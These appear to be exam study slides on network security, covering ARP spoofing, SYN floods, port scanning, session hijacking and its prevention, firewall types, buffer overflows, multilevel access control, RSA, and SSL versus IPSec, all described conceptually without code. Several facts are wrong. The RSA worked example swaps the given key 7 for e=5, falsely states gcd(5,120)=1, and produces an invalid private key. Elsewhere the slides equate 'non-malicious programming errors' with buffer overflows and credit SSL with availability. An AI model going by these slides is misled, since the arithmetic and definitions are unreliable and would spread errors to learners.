- 27. 2. ARP spoofing is a malicious technique that causes the redirection of network traffic to a hacker. 3. ARP Spoofing may denote sniffing out LAN addresses on both wired and wireless LAN networks. 4. The concept behind ARP spoofing is to send bogus ARP communications to Ethernet LANs and the attack may modify traffic or block it altogether. 5. There are three types of ARP spoofing: a. Man-In-The-Middle Attacks: These involve traffic modifications. b. Denial-of-Service Attacks: These involve a fake MAC address attached to the user’s default gateway. c. Passive Sniffing: This happens when traffic is sent to the user’s default gateway through their IP address. 6. Useful and non-malicious usages for ARP spoofing are hotels utilizing the technique to allow guests to access the Internet from their laptops. TCP SYN flood attack: 1. TCP SYN flood is a type of Distributed Denial of Service (DDoS) attack. 2. It exploits part of the normal TCP three-way handshake to consume resources on the targeted server and to render it. 3. In this attack the offender sends TCP connection requests faster than the targeted machine can process them which cause network saturation. 4. In a SYN flood attack, the attacker sends repeated SYN packets to every port on the targeted server using a fake IP address. The server is unaware of the attack and receives multiple and apparently legitimate requests to establish communication. It responds to each attempt with a SYN-ACK packet from each open port. 5. The malicious client either does not send the expected ACK, or—if the IP address is spoofed—never receives the SYN-ACK in the first place. 6. Either way, the server under attack will wait for acknowledgement of its SYN-ACK packet for some time. Port scanning:
- 28. 1. The act of systematically scanning a computer’s ports is called as port scanning. 2. Port scanning has legitimate uses in managing networks. 3. Port scanning also can be malicious in the nature. 4. Types of port scans: i. vanilla: the scanner attempts to connect to all 65,535 ports ii. Strobe: a more focused scan looking only for known services to exploit iii. Fragmented packets: the scanner sends packet fragments that get through simple packet filters in a firewall iv. UDP: the scanner looks for open UDP ports v. sweep: the scanner connects to the same port on more than one machine vi. FTP bounce: the scanner goes through an FTP serverin order to disguise the source of the scan vii. Stealth scan: the scanner blocks the scanned computer from recording the port scan activities. 5. Port scanning is not a crime. 6. There is no way to stop someone from port scanning your computer while you are on the Internet because accessing an Internet server opens a port, which opens a door to your computer. 7. There are software products that can stop a port scanner from doing any damage to your system. What is sessionhijacking?How doesit occur? Give twoways to preventa sessionhijack10M 1. The Session hijacking attack consists of the exploitation of the web session control mechanism which is managed for a session token. 2. A session token is composed of a string of variable width and it could be used in the URL, cookie, etc. 3. The Session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.
- 29. 4. The session token could be compromised in different ways: i. Predictable session token ii. Session Sniffing iii. Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc) iv. Man-in-the-middle attack v. Man-in-the-browser attack 5. Session hijacking can be done in two levels: I. Network Level II. Application Level I. Network Level: Network layer hijacking involves TCP and UDP sessions. A. TCP session Hijacking: 1. TCP hijacks are meant to intercept the already established TCP sessions between any two communicating parties and then pretending to be one of them and redirecting the TCP traffic to it by injecting spoofed IP packets so that user commands are processed on behalf of the authenticated host of the session. 2. It desynchronizes the session between the actual communicating parties and by intruding itself in between. 3. Authentication is only required at the time of establishing connection. 4. An already established connection can be easily stolen without going through any sort of authentication or security measures concerned. 5. TCP session hijacks can be implemented in two different ways: i. Middle Man Attack ii. Blind attack iii. IP Spoofing
- 30. i. Middle Man Attack: Middle man attack involves using a packet sniffer to intercept the communication between client and the server. ii. Blind attack: If user is not able to sniff the packets and guess the correct sequence number expected by server. iii. IP Spoofing: When a computer outside of your network pretends to be a trusted computer within the network, then, this action by the attacker is called IP Spoofing. B. UDP session hijacking: 1. UDP does not use packet sequencing and synchronizing. 2. It is easier than TCP to hijack UDP session. 3. The hijacker has simply to forge a server reply to a client UDP request before the server can respond. 4. If sniffing is used than it will be easier to control the traffic generating from the side of the server and thus restricting server’s reply to the client in the first place. II. Application level: 1. Application level session hijack occurs with HTTP sessions. 2. At this level a hijacker can not only hijack already existing sessions. 3. Hijacker can also create new sessions fromthe stolen data. 4. HTTP Session Hijack Hijacking: i. HTTP sessions involve obtaining Session ID’s for the sessions. ii. It is the only unique identifier of the HTTP session. iii. Session ID’s can be found at three places in the URL received by the browser for the HTTP GET request with cookies which will be stored in client’s computer within the form fields. Methods to prevent session hijacking: 1. Regenerating the session ID after a successful login: This method prevents the session fixation because the attacker does not know the session ID of the user after he has logged in. 2. Using a Long Random Number or String as a Session Key:
- 31. This reduces the risk that an attack could simply guess a valid session key through trial and error or brute force attacks. 3. Encryption of the data passed between the parties: This technique is widely relied upon by web-based e-commerce services as it completely prevents sniffing-style attacks. Some services make additional checks against the identity of the user. What is firewall? Explain different types of firewalls and specify at which layer of the Internet stack do they operate. 10M Firewall: 1. A firewall is a systemthat provides network security by filtering incoming and outgoing network traffic based on a set of user-defined rules 2. A firewall is a hardware or software which functions in a networked environment to block unauthorized access while permitting authorized communications. 3. The purpose of a firewall is to reduce or eliminate the occurrence of unwanted network communications while allowing all legitimate communication to flow freely. 4. Firewall performs actual actions such as blocking and filtering. 5. Firewall restricts access to your network by deciding which packet should allow. 6. In most server infrastructures, firewalls provide an essential layer of security that, combined with other measures, prevent attackers from accessing your servers in malicious ways. Types of Firewall: Packet Filtering Firewall, Stateful-inspection Firewall, Network Address Translation (NAT) Firewall, Application Based Firewall, Hybrid firewalls. A. Packet Filtering Firewall: i. Packet filtering firewalls work by inspecting individual packets in isolation. ii. Packet filtering firewall is also called as stateless firewall. iii. They are unaware of connection state. iv. They can only allow or deny packets based on individual packet headers.
- 32. B. Stateful-inspection Firewall: i. Stateful firewall determines the connection state of packets. ii. It makes them much more flexible than stateless firewalls. iii. They work by collecting related packets until the connection state can be determined before any firewall rules are applied to the traffic. C. Network Address Translation (NAT) Firewall: i. Network Address Translation firewall is the process in which a network device or a firewall, assigns a public address to a computer or group of computers in a private network. ii. The main use of this firewall is to limit the number of public IP addresses an organization or company must use for economy and security purposes. iii. Network address translation is the process of modifying IP information in IP packets. D. Application Based Firewall: i. Application firewalls go one step further by analyzing the data being transmitted. ii. It allows network traffic to be matched against firewall rules that are specific to individual services or applications. iii. These are also known as proxy-based firewalls. E. Hybrid firewalls: i. A hybrid is a firewall that combines features and functions from other types of firewalls. ii. Hybrid firewalls uses multiple approaches within the same device. No-Malicious programming errors 5M 1. No-Malicious programming errors are also known as buffer overflows. 2. A buffer overflow is the computing equivalent of trying to pour two liters of water into a one- liter pitcher. 3. It can be also be stated as trying to copy 4GB data into 2GB drive. 4. This is a stack based buffer overflow and it is also known as smashing the stack.
- 33. 5. Assume a Web form that asks the user to enter data, such as name, age and date of birth of the user. 6. The information entered by the user is then sent to a server and the server writes the data entered to a buffer that can hold N characters. 7. If the server software does not verify that the length of the data is at most N characters, then a buffer overflow will occur. 8. Any overflowing data will overwrite something important and cause the computer to crash. 9. This problem can be explained using software which is used for authentication. 10. The decision of the authentication resides in a single bit. If a buffer overflow overwrites this authentication bit, then the user which is unauthorized can authenticate him as the actual user. 11. Such errors cause program malfunction but do not causes more harm to the system. 12. There may be loss of some important data in this type of errors. Multilevel access control 5M 1. Multilevel access control is also known as label-based access control. 2. Multilevel security or multiple levels of security (MLS) is the application of a computer system to process information with incompatible classifications. 3. It allows user to classify objects and users with security labels. 4. It prevent users from obtaining access to information for which they lack authorization. 5. The security labels are based on hierarchical security levels and non-hierarchical security categories. 6. Multilevel security solution uses the multilevel security feature in the operating system. 7. It prevents unauthorized users from accessing information at a higher classification than their authorization. 8. It also prevents users from declassifying information. 9. Using multilevel security with row-level granularity, user can define strong security for database objects and perform security checks.
- 34. 10. Row-level security checks allow you to control which users have authorization to view, modify, or perform other actions on specific rows of data. 11. Multilevel Access Control Scheme in Transparent Computing (MACTC) to protect user data with different security levels and provide multilevel access control and valid identity authentication. Explain RSA algorithm for publickey encryption. Given modulus N=143 and public key=7, find the values of p, q, phi(n), and private key d. can we choose value of e=5? Justify. RSA algorithm for public key encryption: 1. RSA is one of the public key cryptosystem and it is widely used for secure data transmission. 2. In this cryptosystem there are two keys used for encryption and decryption purpose. 3. Public key is used for encryption and private key is used for decryption. 4. Both the keys, public key and private key are differs from each other. 5. Encryption key is public i.e. it is same for every user or sender. 6. Decryption key is different for each user or receiver. 7. RSA algorithm is an asymmetric cryptographic algorithm. 8. RSA is also called as public key cryptography. 9. Public key is used to encrypt the message and private key is used to decrypt the message and the encrypted message is only decrypted by private key. 10. The process of encryption and decryption in RSA algorithm:
- 35. Given data: N=143, public key=7 Step1: choose two distinct prime numbers p and q. N=143=13*11 Prime numbers, p=13 and q=11 Step2: find n=p*q n=a*b=143 step3: calculate ɸ(n)=(a-1)*(b-1) ɸ(n)=(a-1)*(b-1) =(13-1)*(11-1) =12*10=120 Step4: select e that e is relatively prime to ɸ(n) i.e. gcd(e, ɸ(n))=1 and 1<e< ɸ(n). gcd(e,120)=1 gcd(5,120)=1 …….e=5 is given step5: calculate d d=e-1modɸ(n) or edmodɸ(n)=1 5*d mod20=1 d=(( ɸ(n)*i)+1))/e …………… where i=0 to 9 d=((120*4)+1)/5=481/5=69 d=96 Public key= {e,n}{5,143} Private key= {d,n}{96,143} Difference between SSL and IPSec protocols 5M No. SSL IPSec
- 36. 1 SSL stands for secure socket layer. IPSec stands for internet protocol security. 2 SSL protocol generates between application and transport layer. IPSec protocol operates between network layers. 3 SSL protocol provides confidentiality, integrity and authentication (availability). IPSec protocol provides integrity and authentication (availability). 4 SSL protocol provides protection to browser. IPSec provides secret level security at internet network layer. 5 Protocols of SSL: Handshake protocol, Record protocol, Alert protocol IPSec has two modes: Transport mode, Tunnel mode